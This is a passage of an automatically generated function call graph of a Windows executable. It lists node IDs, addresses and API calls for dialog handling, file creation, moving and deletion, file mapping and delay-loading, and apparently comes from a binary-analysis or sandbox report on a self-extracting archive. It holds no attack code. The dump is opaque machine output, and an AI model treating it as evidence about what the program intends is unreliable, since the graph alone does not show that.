24054->24053 24056 387df8 24055->24056 24056->24034 24056->24035 24057 37e5b1 24058 37e578 24057->24058 24060 37e85d 24058->24060 24086 37e5bb 24060->24086 24062 37e86d 24063 37e8ca 24062->24063 24075 37e8ee 24062->24075 24064 37e7fb DloadReleaseSectionWriteAccess 6 API calls 24063->24064 24065 37e8d5 RaiseException 24064->24065 24066 37eac3 24065->24066 24066->24058 24067 37e966 LoadLibraryExA 24068 37e9c7 24067->24068 24069 37e979 GetLastError 24067->24069 24070 37e9d2 FreeLibrary 24068->24070 24074 37e9d9 24068->24074 24071 37e9a2 24069->24071 24072 37e98c 24069->24072 24070->24074 24076 37e7fb DloadReleaseSectionWriteAccess 6 API calls 24071->24076 24072->24068 24072->24071 24073 37ea37 GetProcAddress 24077 37ea47 GetLastError 24073->24077 24081 37ea95 24073->24081 24074->24073 24074->24081 24075->24067 24075->24068 24075->24074 24075->24081 24078 37e9ad RaiseException 24076->24078 24079 37ea5a 24077->24079 24078->24066 24079->24081 24082 37e7fb DloadReleaseSectionWriteAccess 6 API calls 24079->24082 24095 37e7fb 24081->24095 24083 37ea7b RaiseException 24082->24083 24084 37e5bb ___delayLoadHelper2@8 6 API calls 24083->24084 24085 37ea92 24084->24085 24085->24081 24087 37e5c7 24086->24087 24088 37e5ed 24086->24088 24103 37e664 24087->24103 24088->24062 24090 37e5cc 24091 37e5e8 24090->24091 24106 37e78d 24090->24106 24111 37e5ee GetModuleHandleW GetProcAddress GetProcAddress 24091->24111 24094 37e836 24094->24062 24096 37e82f 24095->24096 24097 37e80d 24095->24097 24096->24066 24098 37e664 DloadReleaseSectionWriteAccess 3 API calls 24097->24098 24099 37e812 24098->24099 24100 37e82a 24099->24100 24101 37e78d DloadProtectSection 3 API calls 24099->24101 24114 37e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24100->24114 24101->24100 24112 37e5ee GetModuleHandleW GetProcAddress GetProcAddress 24103->24112 24105 37e669 24105->24090 24107 37e7a2 DloadProtectSection 24106->24107 24108 37e7a8 24107->24108 24109 37e7dd VirtualProtect 24107->24109 24113 37e6a3 VirtualQuery GetSystemInfo 24107->24113 24108->24091 24109->24108 24111->24094 24112->24105 24113->24109 24114->24096 25365 37b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25405 371bbd GetCPInfo IsDBCSLeadByte 25367 37eda7 48 API calls _unexpected 25337 37dca1 DialogBoxParamW 25407 37f3a0 27 API calls 25340 38a4a0 71 API calls _free 25341 3908a0 IsProcessorFeaturePresent 25408 366faa 111 API calls 3 library calls 25343 38b49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25386 37c793 102 API calls 5 library calls 25370 379580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25371 37b18d 78 API calls 25345 37c793 97 API calls 4 library calls 25347 382cfb 38 API calls 4 library calls 25372 3695f0 80 API calls 25373 37fd4f 9 API calls 2 library calls 25387 365ef0 82 API calls 24283 3898f0 24291 38adaf 24283->24291 24286 389904 24288 38990c 24289 389919 24288->24289 24299 389920 11 API calls 24288->24299 24292 38ac98 _abort 5 API calls 24291->24292 24293 38add6 24292->24293 24294 38adee TlsAlloc 24293->24294 24295 38addf 24293->24295 24294->24295 24296 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24295->24296 24297 3898fa 24296->24297 24297->24286 24298 389869 20 API calls 2 library calls 24297->24298 24298->24288 24299->24286 24300 38abf0 24301 38abfb 24300->24301 24302 38af0a 11 API calls 24301->24302 24303 38ac24 24301->24303 24304 38ac20 24301->24304 24302->24301 24306 38ac50 DeleteCriticalSection 24303->24306 24306->24304 25348 3888f0 7 API calls ___scrt_uninitialize_crt 24321 37eae7 24322 37eaf1 24321->24322 24323 37e85d ___delayLoadHelper2@8 14 API calls 24322->24323 24324 37eafe 24323->24324 25349 37f4e7 29 API calls _abort 24326 37b7e0 24327 37b7ea __EH_prolog 24326->24327 24492 361316 24327->24492 24330 37b841 24331 37bf0f 24557 37d69e 24331->24557 24332 37b82a 24332->24330 24334 37b89b 24332->24334 24335 37b838 24332->24335 24341 37b92e GetDlgItemTextW 24334->24341 24345 37b8b1 24334->24345 24337 37b83c 24335->24337 24338 37b878 24335->24338 24337->24330 24346 36e617 53 API calls 24337->24346 24338->24330 24348 37b95f KiUserCallbackDispatcher 24338->24348 24339 37bf2a SendMessageW 24340 37bf38 24339->24340 24342 37bf52 GetDlgItem SendMessageW 24340->24342 24343 37bf41 SendDlgItemMessageW 24340->24343 24341->24338 24344 37b96b 24341->24344 24575 37a64d GetCurrentDirectoryW 24342->24575 24343->24342 24349 37b980 GetDlgItem 24344->24349 24490 37b974 24344->24490 24350 36e617 53 API calls 24345->24350 24352 37b85b 24346->24352 24348->24330 24354 37b9b7 SetFocus 24349->24354 24355 37b994 SendMessageW SendMessageW 24349->24355 24351 37b8ce SetDlgItemTextW 24350->24351 24356 37b8d9 24351->24356 24597 36124f SHGetMalloc 24352->24597 24353 37bf82 GetDlgItem 24359 37bfa5 SetWindowTextW 24353->24359 24360 37bf9f 24353->24360 24357 37b9c7 24354->24357 24371 37b9e0 24354->24371 24355->24354 24356->24330 24365 37b8e6 GetMessageW 24356->24365 24361 36e617 53 API calls 24357->24361 24576 37abab GetClassNameW 24359->24576 24360->24359 24366 37b9d1 24361->24366 24362 37b862 24362->24330 24372 37c1fc SetDlgItemTextW 24362->24372 24363 37be55 24367 36e617 53 API calls 24363->24367 24365->24330 24369 37b8fd IsDialogMessageW 24365->24369 24598 37d4d4 24366->24598 24373 37be65 SetDlgItemTextW 24367->24373 24369->24356 24376 37b90c TranslateMessage DispatchMessageW 24369->24376 24378 36e617 53 API calls 24371->24378 24372->24330 24377 37be79 24373->24377 24376->24356 24379 36e617 53 API calls 24377->24379 24381 37ba17 24378->24381 24408 37be9c _wcslen 24379->24408 24380 37bff0 24385 37c020 24380->24385 24388 36e617 53 API calls 24380->24388 24386 364092 _swprintf 51 API calls 24381->24386 24382 37b9d9 24502 36a0b1 24382->24502 24384 37c73f 97 API calls 24384->24380 24389 37c0d8 24385->24389 24395 37c73f 97 API calls 24385->24395 24390 37ba29 24386->24390 24394 37c003 SetDlgItemTextW 24388->24394 24391 37c18b 24389->24391 24431 37c169 24389->24431 24440 36e617 53 API calls 24389->24440 24396 37d4d4 16 API calls 24390->24396 24397 37c194 EnableWindow 24391->24397 24398 37c19d 24391->24398 24392 37ba73 24508 37ac04 SetCurrentDirectoryW 24392->24508 24393 37ba68 GetLastError 24393->24392 24399 36e617 53 API calls 24394->24399 24404 37c03b 24395->24404 24396->24382 24397->24398 24410 37c1ba 24398->24410 24616 3612d3 GetDlgItem EnableWindow 24398->24616 24401 37c017 SetDlgItemTextW 24399->24401 24401->24385 24402 37ba87 24411 37ba9e 24402->24411 24412 37ba90 GetLastError 24402->24412 24403 36e617 53 API calls 24403->24330 24405 37c04d 24404->24405 24438 37c072 24404->24438 24614 379ed5 32 API calls 24405->24614 24406 37c0cb 24415 37c73f 97 API calls 24406->24415 24420 36e617 53 API calls 24408->24420 24441 37beed 24408->24441 24409 37c1e1 24409->24330 24419 36e617 53 API calls 24409->24419 24410->24409 24424 37c1d9 SendMessageW 24410->24424 24416 37bb11 24411->24416 24417 37baae GetTickCount 24411->24417 24418 37bb20 24411->24418 24412->24411 24414 37c1b0 24617 3612d3 GetDlgItem EnableWindow 24414->24617 24415->24389 24416->24418 24421 37bd56 24416->24421 24426 364092 _swprintf 51 API calls 24417->24426 24428 37bcfb 24418->24428 24429 37bcf1 24418->24429 24430 37bb39 GetModuleFileNameW 24418->24430 24419->24362 24427 37bed0 24420->24427 24517 3612f1 GetDlgItem ShowWindow 24421->24517 24422 37c066 24422->24438 24424->24409 24433 37bac7 24426->24433 24434 364092 _swprintf 51 API calls 24427->24434 24437 36e617 53 API calls 24428->24437 24429->24338 24429->24428 24608 36f28c 82 API calls 24430->24608 24615 379ed5 32 API calls 24431->24615 24432 37bd66 24518 3612f1 GetDlgItem ShowWindow 24432->24518 24509 36966e 24433->24509 24434->24441 24444 37bd05 24437->24444 24438->24406 24445 37c73f 97 API calls 24438->24445 24440->24389 24441->24403 24442 37bb5f 24447 364092 _swprintf 51 API calls 24442->24447 24443 37c188 24443->24391 24448 364092 _swprintf 51 API calls 24444->24448 24449 37c0a0 24445->24449 24446 37bd70 24450 36e617 53 API calls 24446->24450 24452 37bb81 CreateFileMappingW 24447->24452 24453 37bd23 24448->24453 24449->24406 24454 37c0a9 DialogBoxParamW 24449->24454 24455 37bd7a SetDlgItemTextW 24450->24455 24457 37bbe3 GetCommandLineW 24452->24457 24485 37bc60 __InternalCxxFrameHandler 24452->24485 24465 36e617 53 API calls 24453->24465 24454->24338 24454->24406 24519 3612f1 GetDlgItem ShowWindow 24455->24519 24456 37baed 24459 37baf4 GetLastError 24456->24459 24460 37baff 24456->24460 24461 37bbf4 24457->24461 24459->24460 24463 36959a 80 API calls 24460->24463 24609 37b425 SHGetMalloc 24461->24609 24462 37bd8c SetDlgItemTextW GetDlgItem 24466 37bdc1 24462->24466 24467 37bda9 GetWindowLongW SetWindowLongW 24462->24467 24463->24416 24469 37bd3d 24465->24469 24520 37c73f 24466->24520 24467->24466 24468 37bc10 24610 37b425 SHGetMalloc 24468->24610 24473 37bc1c 24611 37b425 SHGetMalloc 24473->24611 24474 37c73f 97 API calls 24476 37bddd 24474->24476 24545 37da52 24476->24545 24477 37bc28 24612 36f3fa 82 API calls 2 library calls 24477->24612 24478 37bccb 24478->24429 24484 37bce1 UnmapViewOfFile CloseHandle 24478->24484 24482 37bc3f MapViewOfFile 24482->24485 24483 37c73f 97 API calls 24489 37be03 24483->24489 24484->24429 24485->24478 24486 37bcb7 Sleep 24485->24486 24486->24478 24486->24485 24487 37be2c 24613 3612d3 GetDlgItem EnableWindow 24487->24613 24489->24487 24491 37c73f 97 API calls 24489->24491 24490->24338 24490->24363 24491->24487 24493 361378 24492->24493 24495 36131f 24492->24495 24619 36e2c1 GetWindowLongW SetWindowLongW 24493->24619 24494 361385 24494->24330 24494->24331 24494->24332 24495->24494 24618 36e2e8 62 API calls 2 library calls 24495->24618 24498 361341 24498->24494 24499 361354 GetDlgItem 24498->24499 24499->24494 24500 361364 24499->24500 24500->24494 24501 36136a SetWindowTextW 24500->24501 24501->24494 24504 36a0bb 24502->24504 24503 36a175 24503->24392 24503->24393 24504->24503 24505 36a14c 24504->24505 24620 36a2b2 24504->24620 24505->24503 24506 36a2b2 8 API calls 24505->24506 24506->24503 24508->24402 24510 369678 24509->24510 24511 3696d5 CreateFileW 24510->24511 24512 3696c9 24510->24512 24511->24512 24513 36971f 24512->24513 24514 36bb03 GetCurrentDirectoryW 24512->24514 24513->24456 24515 369704 24514->24515 24515->24513 24516 369708 CreateFileW 24515->24516 24516->24513 24517->24432 24518->24446 24519->24462 24521 37c749 __EH_prolog 24520->24521 24522 37bdcf 24521->24522 24652 37b314 24521->24652 24522->24474 24525 37b314 ExpandEnvironmentStringsW 24534 37c780 _wcslen _wcsrchr 24525->24534 24526 37ca67 SetWindowTextW 24526->24534 24531 37c855 SetFileAttributesW 24532 37c90f GetFileAttributesW 24531->24532 24544 37c86f _abort _wcslen 24531->24544 24532->24534 24535 37c921 DeleteFileW 24532->24535 24534->24522 24534->24525 24534->24526 24534->24531 24537 37cc31 GetDlgItem SetWindowTextW SendMessageW 24534->24537 24540 37cc71 SendMessageW 24534->24540 24656 371fbb CompareStringW 24534->24656 24657 37a64d GetCurrentDirectoryW 24534->24657 24659 36a5d1 6 API calls 24534->24659 24660 36a55a FindClose 24534->24660 24661 37b48e 76 API calls 2 library calls 24534->24661 24662 383e3e 24534->24662 24535->24534 24538 37c932 24535->24538 24537->24534 24539 364092 _swprintf 51 API calls 24538->24539 24541 37c952 GetFileAttributesW 24539->24541 24540->24534 24541->24538 24542 37c967 MoveFileW 24541->24542 24542->24534 24543 37c97f MoveFileExW 24542->24543 24543->24534 24544->24532 24544->24534 24658 36b991 51 API calls 3 library calls 24544->24658 24546 37da5c __EH_prolog 24545->24546 24677 370659 24546->24677 24548 37da8d 24681 365b3d 24548->24681 24550 37daab 24685 367b0d 24550->24685 24554 37dafe 24701 367b9e 24554->24701 24556 37bdee 24556->24483 24558 37d6a8 24557->24558 24559 37a5c6 4 API calls 24558->24559 24560 37d6ad 24559->24560 24561 37bf15 24560->24561 24562 37d6b5 GetWindow 24560->24562 24561->24339 24561->24340 24562->24561 24567 37d6d5 24562->24567 24563 37d6e2 GetClassNameW 25195 371fbb CompareStringW 24563->25195 24565 37d706 GetWindowLongW 24566 37d76a GetWindow 24565->24566 24568 37d716 SendMessageW 24565->24568 24566->24561 24566->24567 24567->24561 24567->24563 24567->24565 24567->24566 24568->24566 24569 37d72c GetObjectW 24568->24569 25196 37a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24569->25196 24571 37d743 25197 37a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24571->25197 25198 37a80c 8 API calls 24571->25198 24574 37d754 SendMessageW DeleteObject 24574->24566 24575->24353 24577 37abf1 24576->24577 24578 37abcc 24576->24578 24580 37abf6 SHAutoComplete 24577->24580 24581 37abff 24577->24581 25199 371fbb CompareStringW 24578->25199 24580->24581 24584 37b093 24581->24584 24582 37abdf 24582->24577 24583 37abe3 FindWindowExW 24582->24583 24583->24577 24585 37b09d __EH_prolog 24584->24585 24586 3613dc 84 API calls 24585->24586 24587 37b0bf 24586->24587 25200 361fdc 24587->25200 24590 37b0eb 24593 3619af 128 API calls 24590->24593 24591 37b0d9 24592 361692 86 API calls 24591->24592 24594 37b0e4 24592->24594 24596 37b10d __InternalCxxFrameHandler ___std_exception_copy 24593->24596 24594->24380 24594->24384 24595 361692 86 API calls 24595->24594 24596->24595 24597->24362 25208 37b568 PeekMessageW 24598->25208 24601 37d536 SendMessageW SendMessageW 24603 37d572 24601->24603 24604 37d591 SendMessageW SendMessageW SendMessageW 24601->24604 24602 37d502 24607 37d50d ShowWindow SendMessageW SendMessageW 24602->24607 24603->24604 24605 37d5e7 SendMessageW 24604->24605 24606 37d5c4 SendMessageW 24604->24606 24605->24382 24606->24605 24607->24601 24608->24442 24609->24468 24610->24473 24611->24477 24612->24482 24613->24490 24614->24422 24615->24443 24616->24414 24617->24410 24618->24498 24619->24494 24621 36a2bf 24620->24621 24622 36a2e3 24621->24622 24623 36a2d6 CreateDirectoryW 24621->24623 24641 36a231 24622->24641 24623->24622 24625 36a316 24623->24625 24628 36a325 24625->24628 24633 36a4ed 24625->24633 24627 36a329 GetLastError 24627->24628 24628->24504 24629 36bb03 GetCurrentDirectoryW 24631 36a2ff 24629->24631 24631->24627 24632 36a303 CreateDirectoryW 24631->24632 24632->24625 24632->24627 24634 37ec50 24633->24634 24635 36a4fa SetFileAttributesW 24634->24635 24636 36a510 24635->24636 24637 36a53d 24635->24637 24638 36bb03 GetCurrentDirectoryW 24636->24638 24637->24628 24639 36a524 24638->24639 24639->24637 24640 36a528 SetFileAttributesW 24639->24640 24640->24637 24644 36a243 24641->24644 24645 37ec50 24644->24645 24646 36a250 GetFileAttributesW 24645->24646 24647 36a261 24646->24647 24648 36a23a 24646->24648 24649 36bb03 GetCurrentDirectoryW 24647->24649 24648->24627 24648->24629 24650 36a275 24649->24650 24650->24648 24651 36a279 GetFileAttributesW 24650->24651 24651->24648 24653 37b31e 24652->24653 24654 37b40d 24653->24654 24655 37b3f0 ExpandEnvironmentStringsW 24653->24655 24654->24534 24655->24654 24656->24534 24657->24534 24658->24544 24659->24534 24660->24534 24661->24534 24663 388e54 24662->24663 24664 388e6c 24663->24664 24665 388e61 24663->24665 24667 388e74 24664->24667 24673 388e7d _abort 24664->24673 24666 388e06 __vsnwprintf_l 21 API calls 24665->24666 24671 388e69 24666->24671 24668 388dcc _free 20 API calls 24667->24668 24668->24671 24669 388e82 24675 3891a8 20 API calls _free 24669->24675 24670 388ea7 HeapReAlloc 24670->24671 24670->24673 24671->24534 24673->24669 24673->24670 24676 387a5e 7 API calls 2 library calls 24673->24676 24675->24671 24676->24673 24678 370666 _wcslen 24677->24678 24705 3617e9 24678->24705 24680 37067e 24680->24548 24682 370659 _wcslen 24681->24682 24683 3617e9 78 API calls 24682->24683 24684 37067e 24683->24684 24684->24550 24686 367b17 __EH_prolog 24685->24686 24722 36ce40 24686->24722 24688 367b32 24689 37eb38 8 API calls 24688->24689 24690 367b5c 24689->24690 24728 374a76 24690->24728 24693 367c7d 24694 367c87 24693->24694 24696 367cf1 24694->24696 24757 36a56d 24694->24757 24698 367d50 24696->24698 24735 368284 24696->24735 24697 367d92 24697->24554 24698->24697 24763 36138b 74 API calls 24698->24763 24702 367bac 24701->24702 24704 367bb3 24701->24704 24703 372297 86 API calls 24702->24703 24703->24704 24706 3617ff 24705->24706 24717 36185a __InternalCxxFrameHandler 24705->24717 24707 361828 24706->24707 24718 366c36 76 API calls __vswprintf_c_l 24706->24718 24708 361887 24707->24708 24714 361847 ___std_exception_copy 24707->24714 24710 383e3e 22 API calls 24708->24710 24712 36188e 24710->24712 24711 36181e 24719 366ca7 75 API calls 24711->24719 24712->24717 24721 366ca7 75 API calls 24712->24721 24714->24717 24720 366ca7 75 API calls 24714->24720 24717->24680 24718->24711 24719->24707 24720->24717 24721->24717 24723 36ce4a __EH_prolog 24722->24723 24724 37eb38 8 API calls 24723->24724 24725 36ce8d 24724->24725 24726 37eb38 8 API calls 24725->24726 24727 36ceb1 24726->24727 24727->24688 24729 374a80 __EH_prolog 24728->24729 24730 37eb38 8 API calls 24729->24730 24731 374a9c 24730->24731 24732 367b8b 24731->24732 24734 370e46 80 API calls 24731->24734 24732->24693 24734->24732 24736 36828e __EH_prolog 24735->24736 24764 3613dc 24736->24764 24738 3682aa 24740 3682bb 24738->24740 24907 369f42 24738->24907 24742 3682f2 24740->24742 24772 361a04 24740->24772 24903 361692 24742->24903 24745 368389 24791 368430 24745->24791 24749 3683e8 24799 361f6d 24749->24799 24752 3682ee 24752->24742 24752->24745 24755 36a56d 7 API calls 24752->24755 24911 36c0c5 CompareStringW _wcslen 24752->24911 24753 3683f3 24753->24742 24803 363b2d 24753->24803 24815 36848e 24753->24815 24755->24752 24758 36a582 24757->24758 24759 36a5b0 24758->24759 25184 36a69b 24758->25184 24759->24694 24761 36a592 24761->24759 24762 36a597 FindClose 24761->24762 24762->24759 24763->24697 24765 3613e1 __EH_prolog 24764->24765 24766 36ce40 8 API calls 24765->24766 24767 361419 24766->24767 24768 37eb38 8 API calls 24767->24768 24771 361474 _abort 24767->24771 24769 361461 24768->24769 24769->24771 24912 36b505 24769->24912 24771->24738 24773 361a0e __EH_prolog 24772->24773 24785 361a61 24773->24785 24787 361b9b 24773->24787 24928 3613ba 24773->24928 24776 361bc7 24931 36138b 74 API calls 24776->24931 24778 363b2d 101 API calls 24781 361c12 24778->24781 24779 361bd4 24779->24778 24779->24787 24780 361c5a 24784 361c8d 24780->24784 24780->24787 24932 36138b 74 API calls 24780->24932 24781->24780 24783 363b2d 101 API calls 24781->24783 24783->24781 24784->24787 24789 369e80 79 API calls 24784->24789 24785->24776 24785->24779 24785->24787 24786 363b2d 101 API calls 24788 361cde 24786->24788 24787->24752 24788->24786 24788->24787 24789->24788 24790 369e80 79 API calls 24790->24785 24950 36cf3d 24791->24950 24793 368440 24954 3713d2 GetSystemTime SystemTimeToFileTime 24793->24954 24795 3683a3 24795->24749 24796 371b66 24795->24796 24955 37de6b 24796->24955 24800 361f72 __EH_prolog 24799->24800 24802 361fa6 24800->24802 24963 3619af 24800->24963 24802->24753 24804 363b3d 24803->24804 24805 363b39 24803->24805 24814 369e80 79 API calls 24804->24814 24805->24753 24806 363b4f 24807 363b6a 24806->24807 24808 363b78 24806->24808 24813 363baa 24807->24813 25118 3632f7 89 API calls 2 library calls 24807->25118 25119 36286b 101 API calls 3 library calls 24808->25119 24811 363b76 24811->24813 25120 3620d7 74 API calls 24811->25120 24813->24753 24814->24806 24816 368498 __EH_prolog 24815->24816 24819 3684d5 24816->24819 24830 368513 24816->24830 25145 378c8d 103 API calls 24816->25145 24817 3684f5 24820 36851c 24817->24820 24821 3684fa 24817->24821 24819->24817 24822 36857a 24819->24822 24819->24830 24820->24830 25147 378c8d 103 API calls 24820->25147 24821->24830 25146 367a0d 152 API calls 24821->25146 24822->24830 25121 365d1a 24822->25121 24826 368605 24826->24830 25127 368167 24826->25127 24829 368797 24831 36a56d 7 API calls 24829->24831 24833 368802 24829->24833 24830->24753 24831->24833 24832 36d051 82 API calls 24840 36885d 24832->24840 25133 367c0d 24833->25133 24835 36898b 25150 362021 74 API calls 24835->25150 24836 368a5f 24841 368ab6 24836->24841 24853 368a6a 24836->24853 24837 368992 24837->24836 24842 3689e1 24837->24842 24840->24830 24840->24832 24840->24835 24840->24837 25148 368117 84 API calls 24840->25148 25149 362021 74 API calls 24840->25149 24848 368a4c 24841->24848 25153 367fc0 97 API calls 24841->25153 24843 368b14 24842->24843 24845 36a231 3 API calls 24842->24845 24842->24848 24862 368b82 24843->24862 24891 369105 24843->24891 25154 3698bc 24843->25154 24844 368ab4 24849 36959a 80 API calls 24844->24849 24850 368a19 24845->24850 24847 36959a 80 API calls 24847->24830 24848->24843 24848->24844 24849->24830 24850->24848 25151 3692a3 97 API calls 24850->25151 24851 36ab1a 8 API calls 24854 368bd1 24851->24854 24853->24844 25152 367db2 101 API calls 24853->25152 24857 36ab1a 8 API calls 24854->24857 24874 368be7 24857->24874 24860 368b70 25158 366e98 77 API calls 24860->25158 24862->24851 24863 368cbc 24864 368e40 24863->24864 24865 368d18 24863->24865 24868 368e66 24864->24868 24869 368e52 24864->24869 24881 368d49 24864->24881 24866 368d8a 24865->24866 24867 368d28 24865->24867 24875 368167 19 API calls 24866->24875 24871 368d6e 24867->24871 24878 368d37 24867->24878 24870 373377 75 API calls 24868->24870 24872 369215 123 API calls 24869->24872 24873 368e7f 24870->24873 24871->24881 25161 3677b8 111 API calls 24871->25161 24872->24881 24876 373020 123 API calls 24873->24876 24874->24863 24882 36981a 79 API calls 24874->24882 24887 368c93 24874->24887 24879 368dbd 24875->24879 24876->24881 25160 362021 74 API calls 24878->25160 24879->24881 24884 368de6 24879->24884 24885 368df5 24879->24885 24895 368f85 24881->24895 25164 362021 74 API calls 24881->25164 24882->24887 25162 367542 85 API calls 24884->25162 25163 369155 93 API calls __EH_prolog 24885->25163 24887->24863 25159 369a3c 82 API calls 24887->25159 24890 369090 24890->24891 24893 36a4ed 3 API calls 24890->24893 24891->24847 24892 36903e 25140 369da2 24892->25140 24894 3690eb 24893->24894 24894->24891 25165 362021 74 API calls 24894->25165 24895->24890 24895->24891 24895->24892 25139 369f09 SetEndOfFile 24895->25139 24898 369085 24900 369620 77 API calls 24898->24900 24900->24890 24901 3690fb 25166 366dcb 76 API calls _wcschr 24901->25166 24904 3616a4 24903->24904 25182 36cee1 86 API calls 24904->25182 24908 369f59 24907->24908 24909 369f63 24908->24909 25183 366d0c 78 API calls 24908->25183 24909->24740 24911->24752 24913 36b50f __EH_prolog 24912->24913 24918 36f1d0 82 API calls 24913->24918 24915 36b521 24919 36b61e 24915->24919 24918->24915 24920 36b630 _abort 24919->24920 24923 3710dc 24920->24923 24926 37109e GetCurrentProcess GetProcessAffinityMask 24923->24926 24927 36b597 24926->24927 24927->24771 24933 361732 24928->24933 24930 3613d6 24930->24790 24931->24787 24932->24784 24934 361748 24933->24934 24945 3617a0 __InternalCxxFrameHandler 24933->24945 24935 361771 24934->24935 24946 366c36 76 API calls __vswprintf_c_l 24934->24946 24937 3617c7 24935->24937 24942 36178d ___std_exception_copy 24935->24942 24939 383e3e 22 API calls 24937->24939 24938 361767 24947 366ca7 75 API calls 24938->24947 24941 3617ce 24939->24941 24941->24945 24949 366ca7 75 API calls 24941->24949 24942->24945 24948 366ca7 75 API calls 24942->24948 24945->24930 24946->24938 24947->24935 24948->24945 24949->24945 24951 36cf4d 24950->24951 24953 36cf54 24950->24953 24952 36981a 79 API calls 24951->24952 24952->24953 24953->24793 24954->24795 24956 37de78 24955->24956 24957 36e617 53 API calls 24956->24957 24958 37de9b 24957->24958 24959 364092 _swprintf 51 API calls 24958->24959 24960 37dead 24959->24960 24961 37d4d4 16 API calls 24960->24961 24962 371b7c 24961->24962 24962->24749 24964 3619bf 24963->24964 24965 3619bb 24963->24965 24968 369e80 79 API calls 24964->24968 24965->24802 24966 3619d4 24969 3618f6 24966->24969 24968->24966 24970 361908 24969->24970 24971 361945 24969->24971 24972 363b2d 101 API calls 24970->24972 24977 363fa3 24971->24977 24976 361928 24972->24976 24976->24965 24978 363fac 24977->24978 24979 363b2d 101 API calls 24978->24979 24981 361966 24978->24981 24994 370e08 24978->24994 24979->24978 24981->24976 24982 361e50 24981->24982 24983 361e5a __EH_prolog 24982->24983 25002 363bba 24983->25002 24985 361e84 24986 361732 78 API calls 24985->24986 24989 361f0b 24985->24989 24987 361e9b 24986->24987 25030 3618a9 78 API calls 24987->25030 24989->24976 24990 361eb3 24992 361ebf _wcslen 24990->24992 25031 371b84 MultiByteToWideChar 24990->25031 25032 3618a9 78 API calls 24992->25032 24995 370e0f 24994->24995 24996 370e2a 24995->24996 25000 366c31 RaiseException CallUnexpected 24995->25000 24998 370e3b SetThreadExecutionState 24996->24998 25001 366c31 RaiseException CallUnexpected 24996->25001 24998->24978 25000->24996 25001->24998 25003 363bc4 __EH_prolog 25002->25003 25004 363bf6 25003->25004 25005 363bda 25003->25005 25007 363e51 25004->25007 25010 363c22 25004->25010 25058 36138b 74 API calls 25005->25058 25083 36138b 74 API calls 25007->25083 25009 363be5 25009->24985 25010->25009 25033 373377 25010->25033 25012 363ca3 25013 363d2e 25012->25013 25029 363c9a 25012->25029 25061 36d051 25012->25061 25043 36ab1a 25013->25043 25014 363c9f 25014->25012 25060 3620bd 78 API calls 25014->25060 25016 363c71 25016->25012 25016->25014 25017 363c8f 25016->25017 25059 36138b 74 API calls 25017->25059 25019 363d41 25023 363dd7 25019->25023 25024 363dc7 25019->25024 25067 373020 25023->25067 25047 369215 25024->25047 25027 363dd5 25027->25029 25076 362021 74 API calls 25027->25076 25077 372297 25029->25077 25030->24990 25031->24992 25032->24989 25034 37338c 25033->25034 25036 373396 ___std_exception_copy 25033->25036 25084 366ca7 75 API calls 25034->25084 25037 37341c 25036->25037 25038 3734c6 25036->25038 25042 373440 _abort 25036->25042 25085 3732aa 75 API calls 3 library calls 25037->25085 25086 38238d RaiseException 25038->25086 25041 3734f2 25042->25016 25044 36ab28 25043->25044 25046 36ab32 25043->25046 25045 37eb38 8 API calls 25044->25045 25045->25046 25046->25019 25048 36921f __EH_prolog 25047->25048 25087 367c64 25048->25087 25051 3613ba 78 API calls 25052 369231 25051->25052 25090 36d114 25052->25090 25054 36928a 25054->25027 25056 36d114 118 API calls 25057 369243 25056->25057 25057->25054 25057->25056 25099 36d300 97 API calls __InternalCxxFrameHandler 25057->25099 25058->25009 25059->25029 25060->25012 25062 36d084 25061->25062 25063 36d072 25061->25063 25101 36603a 82 API calls 25062->25101 25100 36603a 82 API calls 25063->25100 25066 36d07c 25066->25013 25068 373052 25067->25068 25069 373029 25067->25069 25075 373046 25068->25075 25116 37552f 123 API calls 2 library calls 25068->25116 25070 373048 25069->25070 25072 37303e 25069->25072 25069->25075 25115 37624a 118 API calls 25070->25115 25102 376cdc 25072->25102 25075->25027 25076->25029 25078 3722a1 25077->25078 25079 3722ba 25078->25079 25082 3722ce 25078->25082 25117 370eed 86 API calls 25079->25117 25081 3722c1 25081->25082 25083->25009 25084->25036 25085->25042 25086->25041 25088 36b146 GetVersionExW 25087->25088 25089 367c69 25088->25089 25089->25051 25095 36d12a __InternalCxxFrameHandler 25090->25095 25091 36d29a 25092 36d2ce 25091->25092 25093 36d0cb 6 API calls 25091->25093 25094 370e08 SetThreadExecutionState RaiseException 25092->25094 25093->25092 25097 36d291 25094->25097 25095->25091 25096 378c8d 103 API calls 25095->25096 25095->25097 25098 36ac05 91 API calls 25095->25098 25096->25095 25097->25057 25098->25095 25099->25057 25100->25066 25101->25066 25103 37359e 75 API calls 25102->25103 25112 376ced __InternalCxxFrameHandler 25103->25112 25104 36d114 118 API calls 25104->25112 25105 3770fe 25106 375202 98 API calls 25105->25106 25107 37710e __InternalCxxFrameHandler 25106->25107 25107->25075 25108 3711cf 81 API calls 25108->25112 25109 373e0b 118 API calls 25109->25112 25110 370f86 88 API calls 25110->25112 25111 377153 118 API calls 25111->25112 25112->25104 25112->25105 25112->25108 25112->25109 25112->25110 25112->25111 25113 37390d 98 API calls 25112->25113 25114 3777ef 123 API calls 25112->25114 25113->25112 25114->25112 25115->25075 25116->25075 25117->25081 25118->24811 25119->24811 25120->24813 25122 365d2a 25121->25122 25167 365c4b 25122->25167 25124 365d5d 25126 365d95 25124->25126 25172 36b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25124->25172 25126->24826 25128 368186 25127->25128 25129 368232 25128->25129 25179 36be5e 19 API calls __InternalCxxFrameHandler 25128->25179 25178 371fac CharUpperW 25129->25178 25132 36823b 25132->24829 25134 367c22 25133->25134 25135 367c5a 25134->25135 25180 366e7a 74 API calls 25134->25180 25135->24840 25137 367c52 25181 36138b 74 API calls 25137->25181 25139->24892 25141 369dc2 25140->25141 25142 369db3 25140->25142 25144 369e3f SetFileTime 25141->25144 25142->25141 25143 369db9 FlushFileBuffers 25142->25143 25143->25141 25144->24898 25145->24819 25146->24830 25147->24830 25148->24840 25149->24840 25150->24837 25151->24848 25152->24844 25153->24848 25155 3698c5 GetFileType 25154->25155 25156 368b5a 25154->25156 25155->25156 25156->24862 25157 362021 74 